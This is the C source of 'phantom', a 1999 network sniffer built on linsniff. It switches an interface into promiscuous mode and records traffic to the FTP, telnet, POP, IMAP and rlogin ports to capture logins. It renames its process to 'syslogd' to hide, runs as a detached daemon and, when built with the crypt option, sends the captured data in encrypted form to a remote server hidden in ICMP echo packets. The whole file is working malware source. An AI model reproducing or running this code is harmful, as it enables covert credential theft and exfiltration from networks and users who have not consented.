
/*      phantom client / sniffer

 * phantom is (c) 1999 by Mixter
 * based on linsniff v0.666 (with linked lists) by humble
 * based on the original linsniff by Mike Edulla
 */

#include "config.h"
#pragma implementation

#define CAPSIZ (MAXIMUM_CAPTURE)

#define LANG_1    "\n*>> %s %s > "	/* time, source */
#define LANG_2    "%s [%d] : tcp %d <<*\n"	/* dest, dport, bytes */
#define LANG_3    "GOT SIGNAL: %d\n"	/* signum */
#define LANG_4    "\t\t>> restarting <<\n\n"
#define HIDE_PROC "syslogd"

int sock;

struct connection
  {
    struct connection *next;

    time_t start;
    time_t lasthit;

    unsigned long saddr;
    unsigned long daddr;
    unsigned short sport;
    unsigned short dport;

    unsigned char data[MAXIMUM_CAPTURE];
    int bytes;
  };

typedef struct connection *clistptr;

clistptr head, tail;

u_short
cksum (u_short * buf, int nwords)
{
  unsigned long sum;
  for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return ~sum;
}

void
send_connect (u_long to, unsigned int id, char *data)
{
  char packet[strlen (data) + sizeof (struct my_icmphdr) + 1];
  struct my_icmphdr *icmp = (struct my_icmphdr *) packet;
  char *content = (packet + sizeof (struct my_icmphdr));
  struct sockaddr_in sa;
  int i, ssock;

  ssock = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP);

  memset (packet, 0, sizeof (packet));

  icmp->type = 0;
  icmp->un.echo.id = htons (id);
  strcpy (content, data);
  icmp->checksum = cksum ((u_short *) icmp, (9 + strlen (data)) >> 1);
  sa.sin_port = htons (0);
  sa.sin_family = AF_INET;
  sa.sin_addr.s_addr = to;
  memset (sa.sin_zero, 0, sizeof (sa.sin_zero));
  i = sendto (ssock, packet, sizeof (packet), 0, (struct sockaddr *) &sa, sizeof (struct sockaddr));
  close (ssock);
}

#ifdef CRYPT_3DES
#include "3way.c"
extern int encrypt_3_way (word96, word8 *, word32);
void
send_crypt (char *data)
{
  word96 salts =
  {SALT1, SALT2, SALT3};
  int i;
  char b[CAPSIZ + 5];

  bzero (b, sizeof (b));
  strncpy (b, data, CAPSIZ);

  for (i = strlen (b);; i++)	/* 96byte-block padding */
    if (i % 96 == 0)
      break;

  encrypt_3_way (salts, b, i);

  strcat (b, "EOR");
  send_connect (inet_addr (SERVER_IP), ICMP_ID, b);

  return;
}
#endif

void
add_node (unsigned long sa, unsigned long da, unsigned short sp, unsigned short dp)
{
  clistptr newnode;

  newnode = (clistptr) malloc (sizeof (struct connection));
  newnode->saddr = sa;
  newnode->daddr = da;
  newnode->sport = sp;
  newnode->dport = dp;
  newnode->bytes = 0;
  newnode->next = NULL;
  time (&(newnode->start));
  time (&(newnode->lasthit));
  if (!head)
    {
      head = newnode;
      tail = newnode;
    }
  else
    {
      tail->next = newnode;
      tail = newnode;
    }
}

char *
hostlookup (unsigned long int in)
{
  static char blah[1024];
  struct in_addr i;

  i.s_addr = in;
  strcpy (blah, inet_ntoa (i));
  return blah;
}

char *
pretty (time_t * t)
{
  char *time;
  time = ctime (t);
  time[strlen (time) - 6] = 0;
  return time;
}

void
remove_node (unsigned long sa, unsigned long da, unsigned short sp, unsigned short dp)
{
  clistptr walker, prev;
  char temp[MAXIMUM_CAPTURE];

  int i = 0;
  int t = 0;

  if (head)
    {
      walker = head;
      prev = head;
      while (walker)
	{
	  if (sa == walker->saddr && da == walker->daddr && sp == walker->sport && dp == walker->dport)
	    {
	      prev->next = walker->next;
	      if (walker == head)
		{
		  head = head->next;;
		  prev = NULL;
		}
	      if (walker == tail)
		tail = prev;

	      if (walker->bytes < 5)
		{
		  free (walker);	/* free johnny */
		  return;
		}

	      bzero (temp, MAXIMUM_CAPTURE);
	      snprintf (temp, MAXIMUM_CAPTURE, LANG_1,
			pretty (&(walker->start)), hostlookup (sa));
	      LOG (temp);

	      bzero (temp, MAXIMUM_CAPTURE);
	      snprintf (temp, MAXIMUM_CAPTURE, LANG_2,
			hostlookup (da), ntohs (dp), walker->bytes);
	      LOG (temp);

	      bzero (temp, MAXIMUM_CAPTURE);

	      for (i = 0; i < walker->bytes; i++)
		{
		  if (walker->data[i] == 13)
		    temp[strlen (temp)] = '\n';
		  if (isprint (walker->data[i]))
		    {
		      /* fuck sprintf */
		      temp[strlen (temp)] = walker->data[i];
		      t++;
		    }
		  if (t > 80)
		    {
		      t = 0;
		      temp[strlen (temp)] = '\n';
		    }
		}
	      free (walker);	/* free johnny =oP~ */
	      if (temp[strlen (temp) - 1] != '\n')
		temp[strlen (temp)] = '\n';
	      if (strlen (temp) > 3)
		LOG (temp);
	      return;
	    }
	  prev = walker;
	  walker = walker->next;
	}
    }
}
void
log_node (unsigned long sa, unsigned long da, unsigned short sp, unsigned short dp, int bytes, char *buffer)
{
  clistptr walker;

  walker = head;
  while (walker)
    {
      if (sa == walker->saddr && da == walker->daddr && sp == walker->sport && dp == walker->dport)
	{
	  time (&(walker->lasthit));
	  strncpy (walker->data + walker->bytes, buffer, MAXIMUM_CAPTURE - walker->bytes);
	  walker->bytes = walker->bytes + bytes;
	  if (walker->bytes >= MAXIMUM_CAPTURE)
	    {
	      walker->bytes = MAXIMUM_CAPTURE;
	      remove_node (sa, da, sp, dp);
	    }
	}
      walker = walker->next;
    }
}


void setup_interface (char *device);
void cleanup (int);

struct etherpacket
  {
    struct ethhdr eth;
    struct iphdr ip;
    struct tcphdr tcp;
    char buff[8192];
  }
ep;

struct iphdr *ip;
struct tcphdr *tcp;

void
cleanup (int sig)
{
  char buffer[64];
  sprintf (buffer, LANG_3, sig);
  LOG (buffer);
  if (sig == 11)
    exit (0);
}

void
purgeidle (int sig)
{
  clistptr walker;
  time_t curtime;
  walker = head;
  signal (SIGALRM, purgeidle);
  alarm (10);

  time (&curtime);
  while (walker)
    {
      if (curtime - walker->lasthit > TIMEOUT)
	{
	  remove_node (walker->saddr, walker->daddr, walker->sport, walker->dport);
	  walker = head;
	}
      else
	walker = walker->next;
    }
}

void
setup_interface (char *device)
{
  int fd;
#ifndef NO_PROMISC
  struct ifreq ifr;
  int s;
#endif

  fd = socket (AF_INET, SOCK_PACKET, htons (ETH_P_ALL));
  if (fd < 0)
    {
      perror ("");
      exit (0);
    }

#ifndef NO_PROMISC
  strcpy (ifr.ifr_name, device);
  s = ioctl (fd, SIOCGIFFLAGS, &ifr);
  if (s < 0)
    {
      close (fd);
      perror ("");
      exit (0);
    }
  ifr.ifr_flags |= IFF_PROMISC;
  s = ioctl (fd, SIOCSIFFLAGS, &ifr);
  if (s < 0)
    perror ("");
#endif
  sock = fd;
}

void
filter (void)
{
  int p;
  p = 0;

  if (ip->protocol != 6)
    return;

  p = 0;
  if (htons (tcp->dest) == 21)
    p = 1;
  if (htons (tcp->dest) == 23)
    p = 1;
  if (htons (tcp->dest) == 106)
    p = 1;
  if (htons (tcp->dest) == 109)
    p = 1;
  if (htons (tcp->dest) == 110)
    p = 1;
  if (htons (tcp->dest) == 143)
    p = 1;
  if (htons (tcp->dest) == 513)
    p = 1;
  if (!p)
    return;

  if (tcp->syn == 1)
    {
      add_node (ip->saddr, ip->daddr, tcp->source, tcp->dest);
    }
  if (tcp->rst == 1)
    {
      remove_node (ip->saddr, ip->daddr, tcp->source, tcp->dest);
    }
  if (tcp->fin == 1)
    {
      remove_node (ip->saddr, ip->daddr, tcp->source, tcp->dest);
    }
  log_node (ip->saddr, ip->daddr, tcp->source, tcp->dest, htons (ip->tot_len) - sizeof (ep.ip) - sizeof (ep.tcp), ep.buff - 2);
}

void
main (int argc, char *argv[])
{
  int x;
  head = tail = NULL;

  ip = (struct iphdr *) (((unsigned long) &ep.ip) - 2);
  tcp = (struct tcphdr *) (((unsigned long) &ep.tcp) - 2);

  bzero (argv[0], sizeof (argv[0]));
  strcpy (argv[0], HIDE_PROC);
  if (fork () == 0)
    {
      close (0);
      close (1);
      close (2);
      setsid ();
      setup_interface (IFACE);

      signal (SIGHUP, cleanup);
      signal (SIGINT, cleanup);
      signal (SIGTERM, cleanup);
      signal (SIGQUIT, cleanup);
      signal (SIGSEGV, cleanup);
      signal (SIGBUS, cleanup);
      signal (SIGALRM, purgeidle);

#ifdef CRYPT_3DES
      LOG (LANG_4);
#endif

      alarm (10);

      while (1)
	{
	  x = read (sock, (struct etherpacket *) &ep, sizeof (struct etherpacket));
	  if (x > 1)
	    filter ();
	}
    }
}
